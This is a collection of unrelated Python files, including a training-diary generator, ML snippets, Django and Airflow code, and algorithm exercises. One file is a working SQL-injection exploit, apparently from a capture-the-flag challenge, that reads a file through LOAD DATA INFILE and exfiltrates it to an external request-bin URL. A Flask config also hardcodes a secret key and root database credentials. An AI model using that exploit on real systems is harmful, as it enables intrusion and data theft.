# Clumsy way because the usual way creates an actual new line when saved in GC
# so a syntax error when loading it back in afterwards
NEWLINE = chr(10)
HARDCODED_EXCUSES = {
datetime.date(2023, 1, 23): "Return from USA",
datetime.date(2023, 1, 9): "Food poisoning",
datetime.date(2022, 12, 29): "Non-covid respiratory suffering",
datetime.date(2022, 12, 23): "Fly to USA",
datetime.date(2022, 8, 15): "Travel London to Carqueiranne",
datetime.date(2022, 8, 3): "Blood blister + return from USA",
datetime.date(2022, 7, 15): "Fly to USA",
datetime.date(2022, 7, 3): "Left hip lateral",
datetime.date(2022, 6, 20): "COVID19",
datetime.date(2022, 6, 19): "COVID19",
datetime.date(2022, 6, 18): "COVID19",
datetime.date(2022, 6, 17): "COVID19",
datetime.date(2022, 4, 1): "Return from USA",
datetime.date(2022, 3, 18): "Headache, tired, fearing Tina's bronchitis",
}
def workout_importance(workout):
if workout is None:
return 0
importance = {
"race": 10,
"vo2max": 9,
"interval": 9,
"race pace": 9,
"cv": 8,
"repetition": 7,
"speed": 7,
"threshold": 6,
"endurance": 5,
"ga": 4,
"recovery": 3,
"warmup": 3,
"cooldown": 3,
}
return importance.get(workout.lower(), 0)
def write_days_activities(activities_for_the_day):
text = ""
for activity in activities_for_the_day:
if activity.sport == "Run":
strides_text = ""
if "strides" in activity.keywords:
strides_text = "<sup>st</sup>"
text += '<p class="activity">{:.1f}km {}{}</p>'.format(
activity.distance, activity.workout_code, strides_text
)
others_sums = {}
for activity in activities_for_the_day:
if activity.sport != "Run":
if activity.sport not in others_sums:
others_sums[activity.sport] = {"distance": 0, "time": 0}
others_sums[activity.sport]["distance"] += activity.distance
others_sums[activity.sport]["time"] += activity.time_moving
for sport in others_sums:
if sport == "Elliptical":
hours, minutes = goldencheetah.seconds_to_hours_minutes(
others_sums[sport]["time"]
)
text += '<p class="activity other">Σ {}:{:02d} {}'.format(
hours, minutes, sport
)
else:
text += '<p class="activity other">Σ {:.1f}km {}'.format(
others_sums[sport]["distance"], sport
)
return text
def write_day(f, activities, excuse, idx):
"""Given a list of activities for a day, writes the HTML for it.
Requires an idx, i.e., the day's number in the week, to know how
far left/right on the page things need to end up."""
# Only write out an excuse if there is no activity that day.
if len(activities) == 0:
# If we have an excuse anyway
if excuse is None:
return
day = '<div class="day day-{} workout-excuse">{}</div>'.format(idx, excuse)
f.write(day)
return
# Amount *ran* that day
distance = 0
workout = None
run_counter = 0
has_sport_other_than_running = False
for activity in activities:
if activity.sport == "Run":
run_counter += 1
distance = distance + activity.distance
# Deciding the "main" colour to use for a given day based on which
# run type is the most interesting.
if workout is None or workout_importance(workout) < workout_importance(
activity.workout_code
):
workout = activity.workout_code
else:
has_sport_other_than_running = True
if workout is None:
if has_sport_other_than_running:
workout = "not-a-run"
else:
workout = "nothing"
day = '<div class="day day-{} workout-{}">'.format(idx, workout.lower())
day += "<datetime>" + activities[0].date.strftime("%-d %h") + "</datetime>"
if run_counter > 1:
day += '<p class="distance">Σ {:.1f}km</p>'.format(distance)
day += write_days_activities(activities)
day += "</div>"
f.write(day)
def sum_week_distance_time(activities):
"""Given a week of activities, i.e. a dict of day->activitiesforthatday,
sums up all the distances and times for runs, and returns them"""
distance = 0
time = 0
for day in activities:
for activity in activities[day]:
if activity.sport == "Run":
distance = distance + activity.distance
time = time + activity.time_moving
return (distance, time)
def write_week(f, activities):
"""Handles writing for a certain week. Input is a dict of
day -> activities for that day."""
days = [*activities]
first_day = days[0]
distance, time = sum_week_distance_time(activities)
hours, minutes = goldencheetah.seconds_to_hours_minutes(time)
isodate = first_day.isocalendar()
overview = (
NEWLINE + '<div class="week">'
'<time class="when">{}W{}</time>'
'<p class="total-distance">{:.1f} km</p>'
'<p class="total-time">{:d}h{:02d}</p>'
)
overview = overview.format(isodate.year, isodate.week, distance, hours, minutes)
header = ""
footer = "" "</div>"
f.write(overview)
f.write(header)
for idx, day in enumerate(sorted(activities)):
write_day(f, activities[day], HARDCODED_EXCUSES.get(day), idx)
f.write(footer)
def write_training_log(f, activities):
"""Creates HTML page of a training log.
Activities are in the format as returned by group_by_week."""
header_a = (
"<!DOCTYPE html>"
"<html>"
"<head><title>Diary</title>"
'<meta charset="utf-8" />'
'<meta name="viewport" content="width=device-width, initial-scale=1" />'
)
header_b = NEWLINE.join(
[
"</head>",
"<body>",
"<p>Generated on {}.</p>".format(
datetime.datetime.now().strftime("%Y-%m-%d")
),
]
)
footer = NEWLINE + "</body>" "</html>"
f.write(header_a)
write_css(f)
f.write(header_b)
for week in reversed(sorted(activities)):
write_week(f, activities[week])
f.write(footer)
def write_css(f):
with open("diary.css", "r") as css_file:
contents = css_file.read()
css = NEWLINE + '<style type="text/css">' + contents + "</style>" + NEWLINE
f.write(css)
all_activities = goldencheetah.get_all_activities(sport=None)
all_activities = goldencheetah.group_by_week(all_activities)
try:
os.mkdir("./output")
except FileExistsError:
pass
NAME = "./output/diary.html"
with open(NAME, "w") as tmp_f:
write_training_log(tmp_f, all_activities)
|
#-*-coding:utf-8-*-
# vim: ft=python
# debug
DEBUG=True
USE_DEBUGGER=True
# used for session
SECRET_KEY='youshouldnotknowthis'
# application side settings
PAGE_SIZE=20
# database settings
SQLALCHEMY_DATABASE_URI='mysql://root:root@localhost/scriptfan_dev?charset=utf8'
SQLALCHEMY_ECHO=False
# LOGGING CONFIG
LOGGER_NAME='scriptfan'
|
from sklearn.ensemble import AdaBoostClassifier
from sklearn import svm
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn import linear_model
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import GaussianNB
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import VotingClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.tree import DecisionTreeClassifier
clf1 = LogisticRegression(solver='lbfgs', multi_class='multinomial',random_state=1)
clf2 = RandomForestClassifier(n_estimators=50, random_state=1)
clf3 = GaussianNB()
#clf = VotingClassifier(estimators=[('lr', clf1), ('rf', clf2), ('gnb', clf3)], voting='hard')
method=[]
method.append(DecisionTreeClassifier())
method.append(MLPClassifier(solver='lbfgs', alpha=1e-5,hidden_layer_sizes=(5, 2), random_state=1))
method.append(KNeighborsClassifier(n_neighbors=10))
method.append(AdaBoostClassifier(n_estimators=10000))
method.append(RandomForestClassifier(n_estimators=100))
method.append(GradientBoostingClassifier(n_estimators=100, learning_rate=1.0,max_depth=1, random_state=0))
#method.append(elcf)
method.append(svm.SVC())
method.append(linear_model.LinearRegression())
method.append(linear_model.Ridge(alpha=0.5))
method.append(linear_model.Lasso(alpha=0.1))
method.append(linear_model.BayesianRidge())
method.append(linear_model.LogisticRegression())
method.append(svm.SVR())
|
import pandas as pd
from openpyxl import load_workbook
from openpyxl.styles import Font
# Load excel files in the DataFrame
df_1 = pd.read_excel('sales.xlsx', sheet_name='Sheet')
df_2 = pd.read_excel('sales.xlsx', sheet_name='Sheet1')
df_3 = pd.read_excel('sales_3.xlsx')
# Combine the DataFrames
df = pd.concat([df_1, df_2, df_3], sort=False, ignore_index=True)
# View the values in dataframe at location 50, If we do not ignore the index then we will get 3 values from 3 DataFrames
# print(df.loc[50])
# Let's view group the data by Item
print(df.groupby(['Item']).sum()['Units Sold'])
# Create a new Total Column
df['Total'] = df['Cost per'] * df['Units Sold']
# Save the data into a new Excel file
df.to_excel("total_sales.xlsx", index=None)
# Now let's open the Workbook for some formatting
wb = load_workbook('total_sales.xlsx')
ws = wb.active
total_col = ws['G1']
total_col.font = Font(bold=True)
wb.save() |
"""
** Author: Xiao Yue
** Date: 2020-08-23
"""
class PlanManager():
def __init__(self):
self.income_arrangement_plan = {
'固定开支': {
'房租': 3430
},
'非固定开支': {
'一般消费预算': 0.15, # 1200
'恋爱基金': 0.1, # 600
'特别预算': 0.15, # 1200
"投资预算": 0.6, # 6000
},
}
self.investment_plan = {
"指数基金": 0.65, # 3900 (165/天)
"货币基金": 0.1, # 600 (20/天)
"股票": 0.1, # 600 (20/天)
"债券": 0.1, # 1200
"贵金属": 0.05 # 300
}
self.total_asset_arrangement_plan = None
def set_income_arrangement_plan(self, plan):
self.income_arrangement_plan = plan
def set_investment_plan(self, plan):
self.investment_plan = plan
def set_total_asset_arrangement_plan(self, plan):
self.total_asset_arrangement_plan = plan
def get_income_arrangement_plan(self):
return self.income_arrangement_plan
def get_investment_plan(self):
return self.investment_plan
def get_total_asset_arrangement_plan(self):
return self.total_asset_arrangement_plan
def save_plan_as_file(self):
pass
def get_investment_amount(self, income):
fixed_spend = sum(self.income_arrangement_plan['固定开支'].values())
return self.income_arrangement_plan['非固定开支']['投资预算'] * (sum(income) - fixed_spend)
|
import math
def read_numbers_from_file (file_name):
text_file = open (file_name, "r")
num_nbrs = int (text_file.readline())
num_list = []
for i in range (0,num_nbrs):
num_list.append(int(text_file.readline()))
num_list.sort()
return num_list
def read_numbers ():
|
list = [3,2,1,3]
max_num = max(list)
print(list.count(max(list)))
|
import os.path
from typing import Callable, Optional
import numpy as np
import torch
from torchvision.datasets.utils import download_url, verify_str_arg
from torchvision.datasets.vision import VisionDataset
class MovingMNIST(VisionDataset):
"""`MovingMNIST <http://www.cs.toronto.edu/~nitish/unsupervised_video/>`_ Dataset.
Args:
root (string): Root directory of dataset where ``MovingMNIST/mnist_test_seq.npy`` exists.
split (string, optional): The dataset split, supports ``None`` (default), ``"train"`` and ``"test"``.
If ``split=None``, the full data is returned.
split_ratio (int, optional): The split ratio of number of frames. If ``split="train"``, the first split
frames ``data[:, :split_ratio]`` is returned. If ``split="test"``, the last split frames ``data[:, split_ratio:]``
is returned. If ``split=None``, this parameter is ignored and the all frames data is returned.
transform (callable, optional): A function/transform that takes in an torch Tensor
and returns a transformed version. E.g, ``transforms.RandomCrop``
download (bool, optional): If true, downloads the dataset from the internet and
puts it in root directory. If dataset is already downloaded, it is not
downloaded again.
"""
_URL = "http://www.cs.toronto.edu/~nitish/unsupervised_video/mnist_test_seq.npy"
def __init__(
self,
root: str,
split: Optional[str] = None,
split_ratio: int = 10,
download: bool = False,
transform: Optional[Callable] = None,
) -> None:
super().__init__(root, transform=transform)
self._base_folder = os.path.join(self.root, self.__class__.__name__)
self._filename = self._URL.split("/")[-1]
if split is not None:
verify_str_arg(split, "split", ("train", "test"))
self.split = split
if not isinstance(split_ratio, int):
raise TypeError(f"`split_ratio` should be an integer, but got {type(split_ratio)}")
elif not (1 <= split_ratio <= 19):
raise ValueError(f"`split_ratio` should be `1 <= split_ratio <= 19`, but got {split_ratio} instead.")
self.split_ratio = split_ratio
if download:
self.download()
if not self._check_exists():
raise RuntimeError("Dataset not found. You can use download=True to download it.")
data = torch.from_numpy(np.load(os.path.join(self._base_folder, self._filename)))
if self.split == "train":
data = data[: self.split_ratio]
elif self.split == "test":
data = data[self.split_ratio :]
self.data = data.transpose(0, 1).unsqueeze(2).contiguous()
def __getitem__(self, idx: int) -> torch.Tensor:
"""
Args:
index (int): Index
Returns:
torch.Tensor: Video frames (torch Tensor[T, C, H, W]). The `T` is the number of frames.
"""
data = self.data[idx]
if self.transform is not None:
data = self.transform(data)
return data
def __len__(self) -> int:
return len(self.data)
def _check_exists(self) -> bool:
return os.path.exists(os.path.join(self._base_folder, self._filename))
def download(self) -> None:
if self._check_exists():
return
download_url(
url=self._URL,
root=self._base_folder,
filename=self._filename,
md5="be083ec986bfe91a449d63653c411eb2",
)
|
#Tino project by Cédric Couvrat
#Bonjour
#0.11 : on met l'algo principal dans un ordre plus compréhensible ! attention nécessite card2data 0.9
#0.10 : on ajoute la fonction de repère temporel
#0.9 : on sait envoyer des données par serie à l'arduino
#0.8 : utilisation du typage de données pour différencier ce qui est envoyé par arduino
#----- on attend 2 distances pour déclancher la question
#0.7 : on fait des fonctions pour la lisibilité et la réutilisabilité
#0.6 : config dans un seul fichier avec configparser
#0.5 : la base de données permet de catégoriser les cartes (cf card2data.v0.3)
#----- on teste la présence du fichier "donnes"
#----- on sort proprement si la connexion avec Tino n'est pas effectuée
#----- on va chercher le port dans un fichier texte
#0.4 : les prénoms sont stockés dans une base de données (cf card2data)
#0.3 : les prénoms sont dans un tableau
#0.2 : on empêche qu'une carte soit présentée 2 fois de suite
# Import de librairies
#import sys
import configparser
import time
from datetime import datetime
import serial
from serial import SerialException
import os.path
import win32com.client
speaker = win32com.client.Dispatch("SAPI.SpVoice")
import tino_fonctions
# Variables globales
seq = []
vu = False
joined_seq_vu=""
jours = ["lundi", "mardi", "mercredi", "jeudi", "vendredi", "samedi", "dimanche"]
today = jours[time.localtime()[6]]
now = datetime.now()
moment_journee = tino_fonctions.plage_horaire()
# Config
if not os.path.isfile('tino_config.cfg'):
tino_fonctions.init_config()
exec(compile(open("select_port.py", "rb").read(), "select_port.py", 'exec'))
cfg = configparser.ConfigParser()
cfg.read('tino_config.cfg')
monport=cfg['Start']['port']
distance=int(cfg['Start']['distance'])
question=cfg['Messages']['question']
# Connexion Arduino
ser = tino_fonctions.connect_tino(monport)
# Initialisation des données cartes
card = tino_fonctions.init_data("card_db")
# On est prêt !
speaker.Speak("Tino, Module Bonjour initialisé.")
print ("Il est ",now.hour," h", now.minute)
print (moment_journee)
continuer = 1
i = 0
while continuer:
for c in ser.read():
seq.append(chr(c)) # ajout chaque ligne reçue depuis ser.read à notre tableau seq
joined_seq = ''.join(str(v) for v in seq[:-2]) #fabrique chaine à partir d'un tableau
if chr(c) == '\n' :
ser.reset_input_buffer()
if joined_seq.startswith("c:"):
#c'est une carte
for key in card.keys():
idcard = joined_seq[2:len(joined_seq)]# on enlève les 2 premiers caractères
if idcard == key and joined_seq_vu!=joined_seq:
print(card[key]['nom'])
dire = card[key]['nom']
if card[key]['cat']=="prenom":
dire = "Bonjour",card[key]['nom']
elif card[key]['nom']=="triste":
ser.write(b'triste\n')
dire = ""
elif card[key]['nom']=="neutre":
ser.write(b'neutre\n')
dire = ""
elif card[key]['nom']=="sourir":
ser.write(b'sourir\n')
dire = ""
elif card[key]['nom']=="bee":
ser.write(b'bee\n')
dire = ""
elif card[key]['cat']=="jour":
if card[key]['nom']==today:
dire = "Nous sommes",card[key]['nom']
else:
dire = "Nous ne sommes pas",card[key]['nom']
else:
dire = card[key]['nom']
speaker.Speak(dire)
joined_seq_vu=joined_seq
vu = False
if joined_seq.startswith("d:"):
#c'est une distance
dist = joined_seq[2:len(joined_seq)]
if int(dist,16) < distance and not vu:
i += 1
if i > 1:
ser.write(b'vu\n')
print (question)
speaker.Speak(question)
joined_seq_vu=""
vu=True
else:
i = 0
seq = [] #on vide le tableau
|
from datetime import datetime
def getMerraStream( date ):
"""
Get data stream prefix for files based on date
See page 19 of https://gmao.gsfc.nasa.gov/pubs/docs/Bosilovich785.pdf
for more information
Arguments:
date (datetime) : Date corresponding to data
Keywords:
None.
Returns:
str : Prefix for file with stream; e.g., MERRA2_100
"""
if date >= datetime(2011, 1, 1, 0):
stream = 400
elif date >= datetime(2001, 1, 1, 0):
stream = 300
elif date >= datetime( 1992, 1, 1, 0):
stream = 200
else:
stream = 100
return 'MERRA2_{}'.format(stream)
|
from rest_framework_mongoengine import routers
from employee.views import EmployeeView
router = routers.DefaultRouter()
router.register(r'employee', EmployeeView)
urlpatterns = []
urlpatterns += router.urls
|
# O(nlog(n))
def merge_sort(seq):
mid = len(seq) // 2
lft, rgt = seq[:mid], seq[mid:]
if len(lft) > 1:
merge_sort(lft)
if len(rgt) > 1:
merge_sort(rgt)
i = 0
j = 0
k = 0
while i < len(lft) and j < len(rgt):
if lft[i] >= rgt[j]:
seq[k] = rgt[j]
k += 1
j += 1
else:
seq[k] = lft[i]
k += 1
i += 1
while i < len(lft):
seq[k] = lft[i]
k += 1
i += 1
while j < len(rgt):
seq[k] = rgt[j]
k += 1
j += 1
return seq
def main():
seq = [1, 5, 3, 4, 6, 2]
seq = merge_sort(seq)
print("".join(str(seq)))
if __name__ == '__main__':
main()
|
// Time Complexity : o(n)
// Space Complexity : o(1)
// Did this code successfully run on Leetcode : yes
class Solution:
def sortColors(self, nums: List[int]) -> None:
res=[]
l=0
h=len(nums)-1
mid=0
while(mid<=h):
if(nums[mid]==1):
mid+=1
elif nums[mid]==0:
nums[mid],nums[l]=nums[l],nums[mid]
mid+=1
l+=1
else:
nums[mid]==2
nums[mid],nums[h]=nums[h],nums[mid]
h-=1
|
"""
Bank account manager. Create a class called Account which will be an
abstract class for three other classes called CheckingAccount,
SavingsAccount and BusinessAccount.
For shortening i simply crate one class which inherits from Account
"""
from abc import *
class Account(object):
# this is fake abstraction
def __init__(self, id):
self.id = id
class RealAbstractAccout(metaclass=ABCMeta):
@abstractproperty
def id_number(self):
return 0
class CheckingAccount(Account):
def __init__(self, id, name):
Account.__init__(self, id)
self.name = name
def __str__(self):
return "%s, %s" % (self.id, self.name)
class RealCheckingAccount(RealAbstractAccout):
def __init__(self, id, name):
Account.__init__(self, id)
self.name = name
@property
def id_number(self):
return self.id
def __str__(self):
return "%s, %s" % (self.id, self.name)
testAc = CheckingAccount(5, "10")
print testAc
|
# -*- coding: utf-8 -*-
"""
Created on Wed May 12 04:34:12 2021
@author: Zakaria
"""
import pandas as pd
data = pd.read_csv('prediction_de_fraud_2.csv')
caracteristiques = data.drop('isFraud', axis=1).values
cible = data['isFraud'].values
from sklearn.preprocessing import LabelEncoder
LabEncdr_X = LabelEncoder()
caracteristiques[:, 1] = LabEncdr_X.fit_transform(caracteristiques[:, 1])
caracteristiques[:, 3] = LabEncdr_X.fit_transform(caracteristiques[:, 3])
caracteristiques[:, 6] = LabEncdr_X.fit_transform(caracteristiques[:, 6])
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(caracteristiques, cible, test_size=.3, random_state=50)
from sklearn.ensemble import RandomForestClassifier
Random_frst_cls = RandomForestClassifier(random_state=50)
Random_frst_cls.fit(x_train, y_train)
Random_frst_cls.score(x_test, y_test) ## ==> 0.9550561797752809
|
from flask_login import LoginManager, login_user, logout_user, login_required, UserMixin, current_user
from app import app
login_manager = LoginManager()
#login_manager.init_app(app)
#login_manager.login_view = ''
@login_manager.user_loader
def load_user(user_id):
return User(user_id)
class User(UserMixin):
def __init__(self,id):
self.id = id |
import re
A = input()
ans = ""
ans += A[0]
a = re.findall("-(\w)", A)
for i in a:
ans += i
print(ans)
# Done
|
import requests
import json
base_url = "http://localhost:4001"
# step 1 -> inject sql statement to create new entry
dns_req_bin = input("Enter your dns req bin url (.url.com): ")
data = {"stockid": "416", "name": "a", "quantity": "0", "vurl": "a'); SET @f=0b001011110110100001101111011011010110010100101111011000110111010001100110001011110110011001101100011000010110011100101110011101000111100001110100; SET @w=0b0010111101101000011011110110110101100101001011110110001101110100011001100010111101100001011100000111000000101111011001000110001000101111011100100111000000101110011100110111000101101100; SET @q = CONCAT(\"LOAD DATA INFILE '\", @f, \"' INTO TABLE stock (@t) SET stockid=111, quantity=0, vurl=CONCAT(@t, '" + dns_req_bin + "');\"); SET @z = CONCAT(\"SELECT @q INTO OUTFILE '\", @w,\"'\"); PREPARE s from @z; EXECUTE s;-- "}
data_json = json.dumps(data)
headers = {"Content-Type": "application/json"}
r = requests.post(base_url + "/api/registerproduct", headers=headers, data=data_json)
print(r.text)
# step 2 -> execute sql
data = {"filename": "rp.sql"}
data_json = json.dumps(data)
headers = {"Content-Type": "application/json"}
r = requests.post(base_url + "/api/initializedb", headers=headers, data=data_json)
print(r.text)
# step 3 -> execute data
data = {"stockid": "111"}
data_json = json.dumps(data)
headers = {"Content-Type": "application/json"}
r = requests.post(base_url + "/api/notifystock", headers=headers, data=data_json)
print("Exploit complete, check reqbin")
|
from django.shortcuts import render, redirect, HttpResponse
# Using Django Messages: https://docs.djangoproject.com/en/1.11/ref/contrib/messages/#displaying-messages
from django.contrib import messages
from .models import *
from django.db.models import Count
# Create your views here.
def index(request):
all_courses = Course.objects.all()
context = {
"all_courses" : all_courses,
}
return render(request, 'courses/index.html', context)
def newCourse(request):
errors = Course.objects.validator(request.POST)
duplicate = Course.objects.duplicate_validator(request.POST)
if len(duplicate) > 0:
messages.error(request, duplicate)
return redirect('/courses/')
if len(errors) > 0:
for k, v in errors.items():
messages.error(request,v)
return redirect('/')
else:
messages.success(request, "Course added!")
Course.objects.create(name=request.POST['name'], desc=request.POST['desc'])
return redirect('/courses/')
def destroyCourse(request, id):
delCourse = Course.objects.get(id=id)
context = {
"course" : delCourse,
}
return render(request, "courses/destroy.html", context)
def userCourses(request):
all_courses = Course.objects.all()
all_users = User.objects.all()
courseNumUsers = Course.objects.annotate(num_users=Count('users_in_course'))
context = {
"all_courses" : all_courses,
"all_users" : all_users,
}
return render(request, "courses/user_courses.html", context)
def addUserToCourse(request):
thisUser = User.objects.get(id=request.session['cur_user'])
thisClass = Course.objects.get(id=request.POST['course'])
thisClass.users_in_course.add(thisUser)
thisClass.save()
return redirect('/courses/userCourses/')
def deleteCourse(request, id):
delCourse = Course.objects.get(id=id)
delCourse.delete()
return redirect('/courses/')
|
__author__ = "snoww0lf@Noobs1337"
__copyright__ = "Copyright (C) 2015 snoww0lf"
__license__ = "MIT License" |
from datetime import datetime
from django.test import TestCase
from django.urls import reverse
from api.tools import date2fraction, fraction2date, format_inline_time
class DatesTestCase(TestCase):
def test_date2fraction(self):
"""
Test the output of date2fraction
"""
expected = {
'20150101120000' : 0.5,
'20150102120000' : 1.5,
'20151231000000' : 364,
}
for inline_time in expected:
time = format_inline_time(inline_time)
fraction = date2fraction(time)
self.assertEquals(fraction, expected[inline_time])
def test_fraction2date(self):
"""
Test the output of fraction2date
"""
expected = {
0.5 : '20150101120000',
1.5 : '20150102120000',
364 : '20151231000000',
}
for day in expected:
calc_time = fraction2date(day)
time = format_inline_time(expected[day])
self.assertTrue(
calc_time.month == time.month and
calc_time.day == time.day and
calc_time.hour == time.hour and
calc_time.second == time.second,
"{} != {}".format(calc_time, time)
)
|
def binarySearch(arr,l,r,x):
if r > l:
mid = l + (r-l)/2
mid = int(mid)
# if element is present at the middle itself
if arr[mid] == x:
return mid
# if element is smaller then it will be available in left sub array
if arr[mid] > x:
return binarySearch(arr,l,mid-1,x)
# if element is greater then mid
return binarySearch(arr,mid+1,r,x)
return -1
def exponentialSearch(arr,n,x):
# if x is present at 0th position
if arr[0] == x:
return 0
# find range of binary search
i = 1
while i <n and arr[i] <=x:
i = i*2
return binarySearch(arr,i/2,min(i,n),x)
arr = [2,4,35,45,56,66,76,87,89]
n = len(arr)
x = 90
result = exponentialSearch(arr,n,x)
if result == -1:
print("Element not found")
else:
print("ELement found at: ",result)
|
from flask import Flask, render_template, request
import joblib
import requests
import xgboost as xgb
import numpy as np
import sklearn
app = Flask(__name__)
model=xgb.XGBClassifier()
model.load_model("xgb_classifier.json")
#Function to seperate char in password
import __main__
def word_divide_char(inputs):
characters=[]
for i in inputs:
characters.append(i)
return characters
__main__.word_divide_char=word_divide_char
#model = pickle.load(open('xgb_pwd_model.pkl', 'rb'))
#vectorizer= pickle.load(open('vectorizer.pkl', 'rb'))
vectorizer=joblib.load("vectorizer.sav")
@app.route('/',methods=['GET'])
def Home():
return render_template('index.html')
@app.route("/predict", methods=['POST'])
def predict():
if request.method == 'POST':
pwd = request.form['pwd']
X_predict=[pwd]
X_predict=vectorizer.transform(X_predict)
prediction=model.predict(X_predict)
if prediction==0:
prediction_text='Weak Password'
elif prediction==1:
prediction_text='Medium Strength Password'
else:
prediction_text='Strong Password'
return render_template('index.html',prediction_text=prediction_text)
else:
return render_template('index.html')
if __name__=="__main__":
app.run(debug=True)
|
from dataclasses import fields
from typing import List
import datetime
from cryptography.x509 import NameAttribute, NameOID, BasicConstraints
from com.SelfOneDrive.WebmanagementSystem.Domain.Model.CertData import CertData
from com.SelfOneDrive.WebmanagementSystem.FileSystem.FileSystemProvider import FileSystemProvider
from flask import Flask, request, jsonify
from .CertificateGenerator.SelfSignedCertificateGenerator import SelfSignedCertificateGenerator
from .CertificateGenerator.CertDataValidator import CertDataValidator
from .Domain.Repository.CertificateRepository import CertificateRepository
from .Domain.Repository.KeyRepository import KeyRepository
def create_app(test_config=None):
app = Flask(__name__)
certDataValidator = CertDataValidator()
sscGenerator = SelfSignedCertificateGenerator()
certRepository = CertificateRepository()
keyRepository = KeyRepository()
with app.app_context():
fsManager = FileSystemProvider()
fsManager.check_prerequisite()
@app.route("/api/v1/certauths", methods=['POST'])
def createNewCert():
jsonData = request.get_json()
certData = CertData(**jsonData)
if certDataValidator.dataObjectContainsAllInformation(certData):
app.logger.info("Daten sind volständig")
ca_information: List[NameAttribute] = [
# Simple Example for creating the ca-information...
#
# x509.NameAttribute(NameOID.COUNTRY_NAME, u"DE"),
# x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u"Niedersachsen"),
# x509.NameAttribute(NameOID.LOCALITY_NAME, u"Braunschweig"),
# x509.NameAttribute(NameOID.COMMON_NAME, u"selfonedrive.home-webserver.de"),
# x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'SelfOneDrive Corp. Root CA'),
# x509.NameAttribute(NameOID.ORGANIZATIONAL_UNIT_NAME, u'Development')
NameAttribute(NameOID.COUNTRY_NAME, certData.country_name),
NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, certData.state_or_province_name),
NameAttribute(NameOID.LOCALITY_NAME, certData.local_city_name),
NameAttribute(NameOID.COMMON_NAME, certData.common_name),
NameAttribute(NameOID.ORGANIZATION_NAME, certData.organization_name),
NameAttribute(NameOID.ORGANIZATIONAL_UNIT_NAME, certData.organization_unit_name),
]
privateKey, certificate = sscGenerator.generate_Certificate_Authority(
ca_information,
datetime.datetime.utcnow() + datetime.timedelta(days=certData.validation_range),
BasicConstraints(True, None)
)
keySuccessfullySaved = keyRepository.persistOne(certData.persistence_identifier, privateKey)
certSuccessfullySaved = certRepository.persistOne(certData.persistence_identifier, certificate)
if keySuccessfullySaved and certSuccessfullySaved:
return jsonify({"successful": True})
else:
return jsonify({"succesful": False})
else:
return jsonify({"successful": False})
@app.route("/api/v1/sslconfigs")
def getAllSslConfigs():
return "getAllSSLConfigs"
return app |
import datetime
import os
from airflow import models
from airflow.contrib.operators import dataproc_operator
from airflow.utils import trigger_rule
yesterday = datetime.datetime.combine(
datetime.datetime.today() - datetime.timedelta(1),
datetime.datetime.min.time())
default_dag_args = {
# Setting start date as yesterday starts the DAG immediately when it is
# detected in the Cloud Storage bucket.
'start_date': yesterday,
# To email on failure or retry set 'email' arg to your email and enable
# emailing here.
'email_on_failure': False,
'email_on_retry': False,
# If a task fails, retry it once after waiting at least 5 minutes
'retries': 1,
'retry_delay': datetime.timedelta(minutes=5),
'project_id': os.environ['PROJECT_ID']
}
pipeline_cluster_name = 'cluster-2-compute-pi-{{ ds_nodash }}'
with models.DAG(
'Compute-PI',
# Continue to run DAG once per day
schedule_interval=datetime.timedelta(days=1),
default_args=default_dag_args) as dag:
# Create a Cloud Dataproc cluster.
create_dataproc_cluster = dataproc_operator.DataprocClusterCreateOperator(
task_id='create_dataproc_cluster',
# Give the cluster a unique name by appending the date scheduled.
# See https://airflow.apache.org/code.html#default-variables
cluster_name=pipeline_cluster_name,
num_workers=2,
region='us-central1',
autoscaling_policy='projects/{}/regions/us-central1/autoscalingPolicies/ephimeral-scaling-policy'.format(os.environ['PROJECT_ID']),
master_machine_type='n1-standard-1',
worker_machine_type='n1-standard-1')
run_py_spark = dataproc_operator.DataProcPySparkOperator(
task_id='run_py_spark',
region='us-central1',
main='gs://{}/data/compute-pi-pipeline/calculate-pi.py'.format(os.environ['COMPOSER_BUCKET']),
arguments=[ models.Variable.get("NUM_SAMPLES") ],
cluster_name=pipeline_cluster_name
)
# Delete Cloud Dataproc cluster.
delete_dataproc_cluster = dataproc_operator.DataprocClusterDeleteOperator(
task_id='delete_dataproc_cluster',
region='us-central1',
cluster_name=pipeline_cluster_name,
# Setting trigger_rule to ALL_DONE causes the cluster to be deleted
# even if the Dataproc job fails.
trigger_rule=trigger_rule.TriggerRule.ALL_DONE)
# Define DAG dependencies.
create_dataproc_cluster >> run_py_spark >> delete_dataproc_cluster
# [END composer_hadoop_steps] |
def weather():
a = 70
if a>= 90:
print ("it is hot outside")
elif a<90 or a>60:
print ("it is warm outside")
else:
print ("it is chilly outside")
weather() |
# coding: utf-8
# In[67]:
import regex as re,string
import nltk
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
stop_words = set(stopwords.words('english'))
from nltk.stem import PorterStemmer
stemmer= PorterStemmer()
from nltk.stem import WordNetLemmatizer
lemmatizer=WordNetLemmatizer()
# In[ ]:
#removes all the blank line from the text file
#returns list
def clear_blank_lines(file):
data = []
with open(file,'r') as f:
temp = f.readlines()
for line in temp:
if line.rstrip():
data.append(line)
return data
# it removes ".\n" from every element by default
# can be used to strip by second argument
def strip_all(data,x='.\n'):
return [each.strip(x) for each in data]
# converts each character to lowercase
def lower_all(data):
return [each.lower() for each in data]
# removes numbers detected anywhere in the data
def remove_numbers(data):
return [re.sub(r'[0-9]+', '',each) for each in data]
# removes punctuations detected anywhere in the data
def remove_symblos(data):
return [re.sub(r'[^\w\s]','',each) for each in data]
# it will remove stop words and return a list of list of words
def remove_stpwrds(data):
return [[w for w in word_tokenize(each) if not w in stop_words] for each in data]
#for tokenization
def token_it(data):
return [[w for w in word_tokenize(each)] for each in data]
# reduces each word to its stem work like, dogs to dog
def stemming(data):
return [[stemmer.stem(word) for word in each] for each in data]
# gets the root word for each word
def lemming(data):
return [[lemmatizer.lemmatize(word) for word in each] for each in data]
def main_cleaner(file,op = 'sents'):
# this is the basic cleaning which operates with each line
part1 = remove_symblos(remove_numbers(lower_all(strip_all(clear_blank_lines(file)))))
# this is the advanced cleaning which operates with each word
part2 = lemming(stemming(remove_stpwrds(part1)))
